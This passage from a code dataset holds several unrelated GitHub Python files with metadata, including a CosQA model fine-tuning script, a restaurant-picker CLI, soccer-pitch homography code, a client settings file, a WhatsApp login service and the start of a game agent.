1\n self.last_line_id = line_id - 1\n self.total_lines = line_id\n","repo_name":"Jasonqi146/Supermarket_CheckOut_Simulator","sub_path":"simulation/grocery_store.py","file_name":"grocery_store.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"39237139779","text":"from __future__ import absolute_import\n\nimport os\nimport logging\nimport argparse\nimport json\nimport math\nimport numpy as np\nfrom io import open\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import Dataset, DataLoader, SequentialSampler, RandomSampler\nfrom torch.utils.data.distributed import DistributedSampler\nfrom transformers import (get_linear_schedule_with_warmup,\n RobertaConfig, RobertaModel, RobertaTokenizer,\n GPT2Config, GPT2Model, GPT2Tokenizer,\n BartConfig, BartForConditionalGeneration, BartTokenizer,\n T5Config, T5ForConditionalGeneration, T5Tokenizer,\n PLBartConfig, PLBartForConditionalGeneration, PLBartTokenizer)\nimport multiprocessing\nimport time\nfrom accelerate import Accelerator\nfrom sklearn.metrics import recall_score, precision_score, 
f1_score, accuracy_score\n\nfrom models import CosQAModel\nfrom configs import add_args, set_seed, set_dist\nfrom utils import get_filenames, get_elapse_time, acc_and_f1\nfrom models import get_model_size\n\nMODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),\n 'vanilla': (RobertaConfig, RobertaModel, RobertaTokenizer),\n 'gpt2': (GPT2Config, GPT2Model, GPT2Tokenizer),\n 't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),\n 'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),\n 'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer),\n 'plbart': (PLBartConfig, PLBartForConditionalGeneration, PLBartTokenizer)}\n\ncpu_cont = multiprocessing.cpu_count()\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass InputFeatures(object):\n \"\"\"A single training/test features for an example.\"\"\"\n\n def __init__(self, code_tokens, code_ids, nl_tokens, nl_ids, label, idx):\n self.code_tokens = code_tokens\n self.code_ids = code_ids # code tokenized idxs\n self.nl_tokens = nl_tokens\n self.nl_ids = nl_ids # nl tokenized idxs\n self.label = label\n self.idx = idx\n\n\nclass InputFeaturesTrip(InputFeatures):\n \"\"\"A single training/test features for an example. Add docstring separately. \"\"\"\n\n def __init__(self, code_tokens, code_ids, nl_tokens, nl_ids, ds_tokens, ds_ids, label, idx):\n super(InputFeaturesTrip, self).__init__(code_tokens, code_ids, nl_tokens, nl_ids, label, idx)\n self.ds_tokens = ds_tokens\n self.ds_ids = ds_ids\n\n\ndef convert_examples_to_features(js, tokenizer, args):\n label = js['label'] if js.get('label', None) else 0\n\n code = js['code']\n if args.code_type == 'code_tokens':\n code = js['code_tokens']\n # if args.model_type != \"gpt2\":\n # code_tokens = tokenizer.tokenize(code)[:args.max_seq_length - 2]\n # code_tokens = [tokenizer.cls_token] + code_tokens + [tokenizer.sep_token]\n # code_ids = tokenizer.convert_tokens_to_ids(code_tokens)\n # padding_length = args.max_seq_length - len(code_ids)\n # code_ids += [tokenizer.pad_token_id] * padding_length\n # else:\n code_tokens = code.split()\n code_ids = tokenizer.encode(\" \".join(code_tokens), padding='max_length', max_length=args.max_seq_length, truncation=True)\n\n nl = js['doc']\n # if args.model_type != \"gpt2\":\n # nl_tokens = tokenizer.tokenize(nl)[:args.max_seq_length - 2]\n # nl_tokens = [tokenizer.cls_token] + nl_tokens + [tokenizer.sep_token]\n # nl_ids = tokenizer.convert_tokens_to_ids(nl_tokens)\n # padding_length = args.max_seq_length - len(nl_ids)\n # nl_ids += [tokenizer.pad_token_id] * padding_length\n # else:\n nl_tokens = nl.split()\n nl_ids = tokenizer.encode(\" \".join(nl_tokens), padding='max_length', max_length=args.max_seq_length, truncation=True)\n\n return InputFeatures(code_tokens, code_ids, nl_tokens, nl_ids, label, js['idx'])\n\n\nclass TextDataset(Dataset):\n def __init__(self, tokenizer, args, file_path=None):\n # file: json file, each dict contains keys: idx, query, doc, code (or 'function_tokens' in a list of string), docstring_tokens (list of strings)\n self.examples = []\n data = []\n with open(file_path, 'r') as f:\n data = json.load(f)\n for js in data:\n self.examples.append(convert_examples_to_features(js, tokenizer, args))\n # if training set, print first three examples\n if 'train' in file_path:\n for idx, example in enumerate(self.examples[:3]):\n logger.info(\"*** Example ***\")\n                
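# '\u0120' is the RoBERTa/GPT-2 BPE marker for a leading space; it is swapped for '_' below purely for readable logs.\n                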
logger.info(\"idx: {}\".format(idx))\n logger.info(\"code_tokens: {}\".format([x.replace('\\u0120', '_') for x in example.code_tokens]))\n logger.info(\"code_ids: {}\".format(' '.join(map(str, example.code_ids))))\n logger.info(\"nl_tokens: {}\".format([x.replace('\\u0120', '_') for x in example.nl_tokens]))\n logger.info(\"nl_ids: {}\".format(' '.join(map(str, example.nl_ids))))\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n \"\"\" return both tokenized code ids and nl ids and label\"\"\"\n return torch.tensor(self.examples[i].code_ids), \\\n torch.tensor(self.examples[i].nl_ids), \\\n torch.tensor(self.examples[i].label)\n\n\neval_dataset = None\n\n\ndef evaluate(args, model, tokenizer, accelerator=None):\n eval_output_dir = args.output_dir\n global eval_dataset\n if eval_dataset is None:\n eval_dataset = TextDataset(tokenizer, args, args.dev_filename)\n\n if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:\n os.makedirs(eval_output_dir)\n\n # Note that DistributedSampler samples randomly\n eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)\n eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size, num_workers=0,\n pin_memory=True)\n\n if accelerator is not None:\n model, eval_dataloader = accelerator.prepare(model, eval_dataloader)\n\n # Eval!\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", len(eval_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n eval_loss = 0.0\n nb_eval_steps = 0\n model.eval()\n all_predictions = []\n all_labels = []\n for batch in eval_dataloader:\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n with torch.no_grad():\n lm_loss, predictions = model(code_inputs, nl_inputs, labels)\n # lm_loss,code_vec,nl_vec = model(code_inputs,nl_inputs)\n eval_loss += lm_loss.mean().item()\n all_predictions.append(predictions.cpu())\n all_labels.append(labels.cpu())\n nb_eval_steps += 1\n all_predictions = torch.cat(all_predictions, 0).squeeze().numpy()\n all_labels = torch.cat(all_labels, 0).squeeze().numpy()\n eval_loss = torch.tensor(eval_loss / nb_eval_steps)\n\n results = acc_and_f1(all_predictions, all_labels)\n results.update({\"eval_loss\": float(eval_loss)})\n return results\n\n\ndef test(args, model, tokenizer, accelerator=None):\n test_dataset = TextDataset(tokenizer, args, args.test_filename)\n eval_sampler = SequentialSampler(test_dataset) if args.local_rank == -1 else DistributedSampler(test_dataset)\n eval_dataloader = DataLoader(test_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)\n\n answers = {}\n with open(args.answer_filename, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n answers[line.split('\\t')[0]] = int(line.split('\\t')[1])\n\n if accelerator is not None:\n model, eval_dataloader = accelerator.prepare(model, eval_dataloader)\n\n logger.info(\"***** Running Test *****\")\n logger.info(\" Num examples = %d\", len(test_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_loss = 0.0\n nb_eval_steps = 0\n all_predictions = []\n all_labels = []\n for batch in eval_dataloader:\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n with torch.no_grad():\n lm_loss, predictions = model(code_inputs, nl_inputs, labels)\n eval_loss += 
lm_loss.mean().item()\n all_predictions.append(predictions.cpu())\n all_labels.append(labels.cpu())\n\n nb_eval_steps += 1\n all_predictions = torch.cat(all_predictions, 0).squeeze().numpy()\n # all_labels = torch.cat(all_labels, 0).squeeze().numpy()\n # eval_loss = torch.tensor(eval_loss / nb_eval_steps)\n # results = acc_and_f1(all_predictions, all_labels)\n # results.update({\"eval_loss\": float(eval_loss)})\n\n # for key in results.keys():\n # logger.info(\" Final test %s = %s\", key, str(results[key]))\n logger.info(\" \" + \"*\" * 20)\n predictions = {}\n with open(os.path.join(args.output_dir, \"predictions.txt\"), 'w') as f:\n for example, pred in zip(test_dataset.examples, all_predictions.tolist()):\n f.write(example.idx + '\\t' + str(int(pred)) + '\\n')\n predictions[example.idx] = int(pred)\n\n scores = calculate_scores(answers, predictions)\n for key, value in scores.items():\n logger.info(\" Final test %s = %s\", key, str(value))\n\n return scores\n\n\ndef calculate_scores(answers, predictions):\n y_trues, y_preds = [], []\n for key in answers:\n if key not in predictions:\n logging.error(\"Missing prediction for index {}.\".format(key))\n continue\n y_trues.append(answers[key])\n y_preds.append(predictions[key])\n scores = {}\n scores['precision'] = precision_score(y_trues, y_preds)\n scores['recall'] = recall_score(y_trues, y_preds)\n scores['f1'] = f1_score(y_trues, y_preds)\n scores['acc'] = accuracy_score(y_trues, y_preds)\n return scores\n\n\ndef main():\n parser = argparse.ArgumentParser()\n t0 = time.time()\n args = add_args(parser)\n logger.info(args)\n\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator(mixed_precision=\"fp16\")\n logger.info(accelerator.state)\n\n set_dist(args, accelerator=accelerator)\n set_seed(args)\n\n args.num_train_epochs = 3\n args.learning_rate = 5e-6\n args.warmup_steps = 500\n args.max_seq_length = 200\n args.code_type = \"code\"\n\n # Build model\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n if args.model_name_or_path == 'none':\n config = config_class.from_pretrained('roberta-base')\n config.num_labels = 2\n model = model_class(config)\n else:\n config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path)\n config.num_labels = 2\n model = model_class.from_pretrained(args.model_name_or_path)\n tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name)\n if args.model_type == 'gpt2':\n tokenizer.pad_token = tokenizer.eos_token\n\n model = CosQAModel(model, config, tokenizer, args)\n logger.info(\"Finish loading model [%s] from %s\", get_model_size(model), args.model_name_or_path)\n\n if args.load_model_path is not None:\n logger.info(\"Reload model from {}\".format(args.load_model_path))\n model.load_state_dict(torch.load(args.load_model_path))\n\n model.to(args.device)\n\n args.train_filename, args.dev_filename, args.test_filename = get_filenames(args.data_dir, args.task, args.sub_task)\n args.answer_filename = f\"{args.data_dir}/{args.task}/answers.txt\"\n\n pool = multiprocessing.Pool(cpu_cont)\n\n fa = open(os.path.join(args.output_dir, 'summary.log'), 'a+')\n loss_file = open(os.path.join(args.output_dir, 'loss.txt'), 'a+')\n time_file = open(os.path.join(args.output_dir, 'time_per_100_steps.txt'), 'a+')\n\n if args.do_train:\n if args.n_gpu > 1:\n # multi-gpu training\n model = torch.nn.DataParallel(model)\n if args.local_rank in [-1, 0] and args.data_num == -1:\n summary_fn = 
'{}/{}'.format(args.summary_dir, '/'.join(args.output_dir.split('/')[1:]))\n tb_writer = SummaryWriter(summary_fn)\n\n train_data = TextDataset(tokenizer, args, args.train_filename)\n\n if args.local_rank == -1:\n train_sampler = RandomSampler(train_data)\n else:\n train_sampler = DistributedSampler(train_data)\n train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n\n num_train_optimization_steps = args.num_train_epochs * len(train_dataloader)\n save_steps = max(len(train_dataloader), 1)\n\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': args.weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n\n if args.warmup_steps < 1:\n warmup_steps = num_train_optimization_steps * args.warmup_steps\n else:\n warmup_steps = int(args.warmup_steps)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=num_train_optimization_steps)\n\n # Start training\n train_example_num = len(train_data)\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", train_example_num)\n logger.info(\" Batch size = %d\", args.train_batch_size)\n logger.info(\" Batch num = %d\", math.ceil(train_example_num / args.train_batch_size))\n logger.info(\" Num epoch = %d\", args.num_train_epochs)\n\n model, optimizer, train_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader\n )\n model.zero_grad()\n\n best_results = {\"acc\": 0.0, \"precision\": 0.0, \"recall\": 0.0, \"f1\": 0.0, \"acc_and_f1\": 0.0}\n global_step, best_acc = 0, 0\n not_acc_inc_cnt = 0\n is_early_stop = False\n for cur_epoch in range(args.start_epoch, int(args.num_train_epochs)):\n # for cur_epoch in range(3):\n bar = tqdm(train_dataloader, total=len(train_dataloader), desc=\"Training\")\n nb_tr_examples, nb_tr_steps, tr_loss = 0, 0, 0\n last_time = time.time()\n model.train()\n for step, batch in enumerate(bar):\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n\n loss, predictions = model(code_inputs, nl_inputs, labels)\n\n if args.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n tr_loss += loss.item()\n\n loss_file.write(f'epoch: {cur_epoch}, step {step}, global step: {global_step}, loss: {loss}\\n')\n\n nb_tr_examples += code_inputs.size(0)\n nb_tr_steps += 1\n # loss.backward()\n accelerator.backward(loss)\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n if nb_tr_steps % args.gradient_accumulation_steps == 0:\n # Update parameters\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n global_step += 1\n train_loss = round(tr_loss * args.gradient_accumulation_steps / nb_tr_steps, 4)\n bar.set_description(\"[{}] Train loss {}\".format(cur_epoch, round(train_loss, 3)))\n\n if nb_tr_steps % 100 == 0:\n time_spend = time.time() - last_time\n time_file.write(f'{time_spend}\\n')\n last_time = time.time()\n\n if args.do_eval:\n logger.info(\"***** CUDA.empty_cache() *****\")\n torch.cuda.empty_cache()\n\n results = evaluate(args, 
model, tokenizer, accelerator=accelerator)\n for key, value in results.items():\n logger.info(\" %s = %s\", key, round(value, 4))\n tb_writer.add_scalar(f\"eval_{key}\", value, cur_epoch)\n\n eval_acc = results[\"acc\"]\n if eval_acc >= best_acc:\n not_acc_inc_cnt = 0\n logger.info(\" Best acc: %s\", round(eval_acc, 4))\n logger.info(\" \" + \"*\" * 20)\n fa.write(\"[%d] Best acc changed into %.4f\\n\" % (cur_epoch, round(eval_acc, 4)))\n best_acc = eval_acc\n # Save best checkpoint for best acc\n output_dir = os.path.join(args.output_dir, 'checkpoint-best-acc')\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n if args.data_num == -1 or True:\n model_to_save = model.module if hasattr(model, 'module') else model\n output_model_file = os.path.join(output_dir, \"pytorch_model.bin\")\n torch.save(model_to_save.state_dict(), output_model_file)\n logger.info(\"Save the best acc model into %s\", output_model_file)\n else:\n not_acc_inc_cnt += 1\n logger.info(\"acc does not increase for %d epochs\", not_acc_inc_cnt)\n if not_acc_inc_cnt > args.patience:\n logger.info(\"Early stop as acc does not increase for %d times\", not_acc_inc_cnt)\n fa.write(\"[%d] Early stop as not_acc_inc_cnt=%d\\n\" % (cur_epoch, not_acc_inc_cnt))\n is_early_stop = True\n break\n\n model.train()\n\n if is_early_stop:\n break\n\n logger.info(\"***** CUDA.empty_cache() *****\")\n torch.cuda.empty_cache()\n\n if args.local_rank in [-1, 0] and args.data_num == -1:\n tb_writer.close()\n\n logger.info(\"Finish training and take %s\", get_elapse_time(t0))\n\n loss_file.close()\n time_file.close()\n\n if args.do_test:\n logger.info(\" \" + \"***** Testing *****\")\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n for criteria in ['best-acc']:\n file = os.path.join(args.output_dir, 'checkpoint-{}/pytorch_model.bin'.format(criteria))\n logger.info(\"Reload model from {}\".format(file))\n model.load_state_dict(torch.load(file))\n\n results = test(args, model, tokenizer, accelerator)\n\n for key, value in results.items():\n fa.write(f\" Final test {key} = {str(value)}\\n\")\n\n if args.res_fn:\n with open(args.res_fn, 'a+') as f:\n f.write('[Time: {}] {}\\n'.format(get_elapse_time(t0), file))\n f.write(\"[%s] acc: %.4f\\n\\n\" % (\n criteria, results['acc']))\n logger.info(\"Finish and take {}\".format(get_elapse_time(t0)))\n fa.write(\"Finish and take {}\".format(get_elapse_time(t0)))\n fa.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NougatCA/CodePTM_re_train","sub_path":"Fine-tune/run_cosqa.py","file_name":"run_cosqa.py","file_ext":"py","file_size_in_byte":20035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"5238450362","text":"\"\"\"This CLI prompts the user for a set of parameters and then picks a random restaurant matching them.\"\"\"\nimport click\n\nfrom restaurant import *\n\n\n@click.command()\n@click.option('--price', type=click.Choice([\"cheap\", \"moderate\", \"expensive\", \"any\"]), prompt='price type of restaurant [\"cheap\", \"moderate\", \"expensive\"]')\n@click.option('--speed', type=click.Choice([\"slow\", \"moderate\", \"fast\", \"any\"]), prompt='speed of service and experience')\n@click.option('--ambiance', type=click.Choice([\"simple\", \"moderate\", \"fancy\", \"any\"]), prompt='the ambiance of the restaurant, i.e. laid back or bougie')\n@click.option('--nutrition', type=click.Choice([\"healthy\", \"moderate\", \"unhealthy\", \"any\"]), prompt='is it healthy for 
you?')\n@click.option('--ethnicity', type=click.Choice([\"filipino\", \"mexican\", \"italian\", \"american\", \"thai\", \"korean\", \"japanese\", \"chinese\", \"vietnamese\", \"mediterranean\", \"any\"]), prompt='the ethnic origin of the cuisine')\n@click.option('--result-type', type=click.Choice(['List', 'Random']), prompt='do you want a random selection or display list of restaurants')\ndef pick_restaurant_prompted(price: Price, speed: Speed, ambiance: Ambiance, nutrition: Nutrition, ethnicity: Ethnicity, result_type: str):\n \"\"\"Prints a random restaurant that satisfies the CLI parameters.\n\n Args:\n price: Price range\n speed: Speed of service and experience\n ambiance: Indoor setting of the place\n nutrition: nutritional rating of a meal here on average\n ethnicity: Ethnic origin of the cuisine\n result_type: print list of restaurants or select one randomly\n\n Returns: None\n\n \"\"\"\n restaurants = []\n\n # for each restaurant: if it doesn't meet the specified criteria, skip it and don't add it to the list\n for i in get_restaurants():\n if price != None and i.price.name != price and price != \"any\":\n continue\n if speed != None and i.speed.name != speed and speed != \"any\":\n continue\n if ambiance != None and i.ambiance.name != ambiance and ambiance != \"any\":\n continue\n if nutrition != None and i.nutrition.name != nutrition and nutrition != \"any\":\n continue\n if ethnicity != None and i.ethnicity.name != ethnicity and ethnicity != \"any\":\n continue\n else:\n restaurants.append(i)\n\n # if no restaurants meet the criteria, print a message and return\n if len(restaurants) < 1:\n click.echo(\"No restaurant found matching criteria!\")\n return\n\n # print the list of matching restaurants\n if result_type == \"List\":\n for x in restaurants:\n click.echo(x.get_details())\n return\n\n # otherwise print a random restaurant that meets the criteria\n result = restaurants[randint(0, len(restaurants)-1)]\n click.echo(result.get_details())\n \nif __name__ == '__main__':\n pick_restaurant_prompted()\n","repo_name":"lbragadev/Restaurant-Picker","sub_path":"pick_restaurant_prompted.py","file_name":"pick_restaurant_prompted.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"74709675638","text":"import argparse\nimport json\nimport os\nimport cv2 as cv\nimport numpy as np\nfrom tqdm import tqdm\nfrom .camera import unproject_image_point\nfrom .soccerpitch import SoccerPitch\nimport time\n\ndef draw_detected_pitch_lines(canvas, lines, line_names, field):\n height, width, _ = canvas.shape\n for i in range(len(lines)):\n x1, y1, _ = lines[i][0]\n x2, y2, _ = lines[i][1]\n x1p = field.x_to_image(width,x1)\n x2p = field.x_to_image(width,x2)\n y1p = field.y_to_image(height,y1)\n y2p = field.y_to_image(height,y2)\n cv.line(canvas, (x1p, y1p), (x2p, y2p), (255, 0, 0), 4)\n cv.putText(canvas, line_names[i], (x1p, y1p), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv.LINE_AA)\n\n return canvas\n\n\ndef normalization_transform(points):\n \"\"\"\n Computes the similarity transform such that the list of points is centered around (0,0) and that the average distance to the\n center is sqrt(2).\n :param points: point cloud that we wish to normalize\n :return: the affine transformation matrix\n \"\"\"\n center = np.mean(points, axis=0)\n\n d = 0.\n nelems = 0\n for p in points:\n nelems += 1\n x = p[0] - center[0]\n y = p[1] - center[1]\n di = np.sqrt(x ** 2 + y ** 2)\n d += (di - d) / nelems\n\n if d <= 0.:\n s = 1.\n else:\n s = np.sqrt(2) / 
d\n T = np.zeros((3, 3))\n T[0, 0] = s\n T[0, 2] = -s * center[0]\n T[1, 1] = s\n T[1, 2] = -s * center[1]\n T[2, 2] = 1\n return T\n\n\ndef estimate_homography_from_line_correspondences(lines, T1=np.eye(3), T2=np.eye(3)):\n \"\"\"\n Given lines correspondences, computes the homography that maps best the two set of lines.\n :param lines: list of pair of 2D lines matches.\n :param T1: Similarity transform to normalize the elements of the source reference system\n :param T2: Similarity transform to normalize the elements of the target reference system\n :return: boolean to indicate success or failure of the estimation, homography\n \"\"\"\n homography = np.eye(3)\n A = np.zeros((len(lines) * 2, 9))\n\n for i, line_pair in enumerate(lines):\n src_line = np.transpose(np.linalg.inv(T1)) @ line_pair[0]\n target_line = np.transpose(np.linalg.inv(T2)) @ line_pair[1]\n u = src_line[0]\n v = src_line[1]\n w = src_line[2]\n\n x = target_line[0]\n y = target_line[1]\n z = target_line[2]\n\n A[2 * i, 0] = 0\n A[2 * i, 1] = x * w\n A[2 * i, 2] = -x * v\n A[2 * i, 3] = 0\n A[2 * i, 4] = y * w\n A[2 * i, 5] = -v * y\n A[2 * i, 6] = 0\n A[2 * i, 7] = z * w\n A[2 * i, 8] = -v * z\n\n A[2 * i + 1, 0] = x * w\n A[2 * i + 1, 1] = 0\n A[2 * i + 1, 2] = -x * u\n A[2 * i + 1, 3] = y * w\n A[2 * i + 1, 4] = 0\n A[2 * i + 1, 5] = -u * y\n A[2 * i + 1, 6] = z * w\n A[2 * i + 1, 7] = 0\n A[2 * i + 1, 8] = -u * z\n\n try:\n u, s, vh = np.linalg.svd(A)\n except np.linalg.LinAlgError:\n return False, homography\n v = np.eye(3)\n has_positive_singular_value = False\n for i in range(s.shape[0] - 1, -2, -1):\n v = np.reshape(vh[i], (3, 3))\n\n if s[i] > 0:\n has_positive_singular_value = True\n break\n\n if not has_positive_singular_value:\n return False, homography\n\n homography = np.reshape(v, (3, 3))\n homography = np.linalg.inv(T2) @ homography @ T1\n homography /= homography[2, 2]\n\n return True, homography\n\n\ndef draw_pitch_homography(image, homography):\n \"\"\"\n Draws points along the soccer pitch markings elements in the image based on the homography projection.\n /!\\ This function assumes that the resolution of the image is 540p.\n :param image\n :param homography: homography that captures the relation between the world pitch plane and the image\n :return: modified image\n \"\"\"\n height, width, _ = image.shape\n field = SoccerPitch()\n polylines = field.sample_field_points()\n for line in polylines.values():\n for point in line:\n if point[2] == 0.:\n hp = np.array((point[0], point[1], 1.))\n projected = homography @ hp\n if projected[2] == 0.:\n continue\n projected /= projected[2]\n if 0 < projected[0] < height and 0 < projected[1] < width:\n cv.circle(image, (int(projected[0]), int(projected[1])), 1, (255, 0, 0), 1)\n\n return image\n\n\ndef homography_from_extremities(predictions, width, height):\n field = SoccerPitch()\n\n line_matches = []\n potential_3d_2d_matches = {}\n line_points = []\n line_names = []\n\n src_pts = []\n success = False\n for k, v in predictions.items():\n if k == 'Circle central' or \"unknown\" in k:\n continue\n # line_extremities_keys maps each detected line to two points\n P3D1 = field.line_extremities_keys[k][0]\n P3D2 = field.line_extremities_keys[k][1]\n # finds the pixel coordinates of the vertices of the line\n p1 = np.array([v[0]['x'] * width, v[0]['y'] * height, 1.])\n p2 = np.array([v[1]['x'] * width, v[1]['y'] * height, 1.])\n\n src_pts.extend([p1, p2])\n\n if P3D1 in potential_3d_2d_matches.keys():\n potential_3d_2d_matches[P3D1].extend([p1, p2])\n else:\n 
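# first time this 3D endpoint is seen: start its list of candidate image points\n 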
potential_3d_2d_matches[P3D1] = [p1, p2]\n if P3D2 in potential_3d_2d_matches.keys():\n potential_3d_2d_matches[P3D2].extend([p1, p2])\n else:\n potential_3d_2d_matches[P3D2] = [p1, p2]\n\n line = np.cross(p1, p2)\n if np.isnan(np.sum(line)) or np.isinf(np.sum(line)):\n continue\n line_pitch = field.get_2d_homogeneous_line(k)\n if line_pitch is not None:\n line_matches.append((line_pitch, line))\n line_points.append(field.get_line_vertices(k))\n line_names.append(k)\n if len(line_matches) >= 4:\n target_pts = [field.point_dict[k][:2] for k in potential_3d_2d_matches.keys()]\n T1 = normalization_transform(target_pts)\n T2 = normalization_transform(src_pts)\n success, homography = estimate_homography_from_line_correspondences(line_matches, T1, T2)\n if success:\n return True, homography, line_names, line_points\n return False, homography, line_names, line_points\n return False, np.array([]), [], []\n","repo_name":"GabrielDiazIV/pytch","sub_path":"tracker/track/localization/baseline_cameras.py","file_name":"baseline_cameras.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"31628703490","text":"# -*- coding:utf-8 -*-\n\nimport os\nBaseDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nParams = {\n \"server\": \"192.168.2.1\",\n \"prot\": 9000,\n \"request_timeout\": 30,\n 'url':{\n \"asset_report_with_no_id\":\"/asset/repost/asset_with_no_asset_id\",\n \"asset_report\": \"/asset/report/\",\n },\n \"asset_id\": \"%s/var/.asset_id\" %BaseDir,\n \"log_file\": '%s/logs/run_log' %BaseDir,\n\n \"auth\":{\n 'user':\"lijie3721@126.com\",\n 'token':'bac',\n },\n}","repo_name":"zhongyuqing910/scripts","sub_path":"makingClient/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73681099637","text":"def buscar_letra_frase(frase, letra):\n for i, caracter in enumerate(frase):\n if caracter == letra:\n return i + 1\n return -1 \n\nif __name__ == \"__main__\":\n frase = input(\"Ingresa una frase \")\n letra = input(\"Ingresa una letra a buscar \")\n\n posicion = buscar_letra_frase(frase, letra)\n\n if posicion > 0:\n print(f\"La letra '{letra}' se encontro en la posicion {posicion} de la frase\")\n else:\n print(f\"No se encontro la letra '{letra}' en la frase\")\n","repo_name":"IES-Rafael-Alberti/2324-u2-sentencias-repetitivas-rekznoz","sub_path":"src/main20.py","file_name":"main20.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43333869900","text":"from python_framework import Service, ServiceMethod\n\nfrom domain import LoginConstants\nfrom enumeration.AuthenticationStatus import AuthenticationStatus\nfrom dto import QRCodeDto\n\n@Service()\nclass LoginService:\n\n @ServiceMethod()\n def isAuthenticated(self) :\n authenticationResponse = self.client.whatsAppWeb.getAuthenticationStatus()\n return AuthenticationStatus.map(authenticationResponse.get('status')) in [\n AuthenticationStatus.AUTHENTICATED,\n AuthenticationStatus.ALREADY_AUTHENTICATED\n ]\n\n @ServiceMethod()\n def initiateAuthenticationByQRCode(self) :\n self.service.qRCode.openIfNedded()\n self.service.qRCode.foceRefresh()\n\n @ServiceMethod(requestClass=[QRCodeDto.QRCodeRequestDto])\n def createOrUpdateQRCode(self, dto) :\n self.service.qRCode.save(dto)\n 
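# show the QR code again right away so the user always scans the latest version\n 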
self.service.qRCode.show()\n\n @ServiceMethod()\n def resumeAuthenticationByQRCode(self) :\n self.service.qRCode.closeQRCode()\n","repo_name":"SamuelJansen/idealizar-whats-app-manager-api","sub_path":"api/src/service/login/LoginService.py","file_name":"LoginService.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"30111048529","text":"#!/usr/bin/python\n\"\"\"Athena agent for CS4500.\n\n\nROFL:ROFL:LOL:ROFL:ROFL\n |\n L /---------\n LOL=== []\\\n L \\ \\\n \\_________\\\n | |\n -------------/\n\nCore gameplay logic\n\"\"\"\n\nimport gflags\nimport logging\nimport random\nimport time\n\nimport offer\nimport playercontext\nimport problem\nimport relation\n\ngflags.DEFINE_integer('offercount', 2,\n 'New offers to generate each round')\nFLAGS = gflags.FLAGS\n\nclass Game(object):\n \"\"\"Contain core gameplay logic in this class.\"\"\"\n\n REPLYTYPES = ['offer', 'reoffer', 'accept', 'provide', 'solve']\n\n def __init__(self, initialdata):\n # Get the game context\n self.context = playercontext.PlayerContext.FromString(initialdata)\n self.context.their_offered.sort()\n self.context.their_offered.reverse()\n # Store our player id locally\n self.id = int(self.context.playerid)\n # We make this a list of tuples, ('type', 'reply') \n self.replies = []\n\n def CountReplyType(self, typelist):\n \"\"\"Count the number of replies of a given type or types.\n\n Args:\n typelist: list of strings: List of REPLYTYPES\n\n Returns:\n integer\n \"\"\"\n count = 0\n for x in self.replies:\n if x[0] in typelist:\n count += 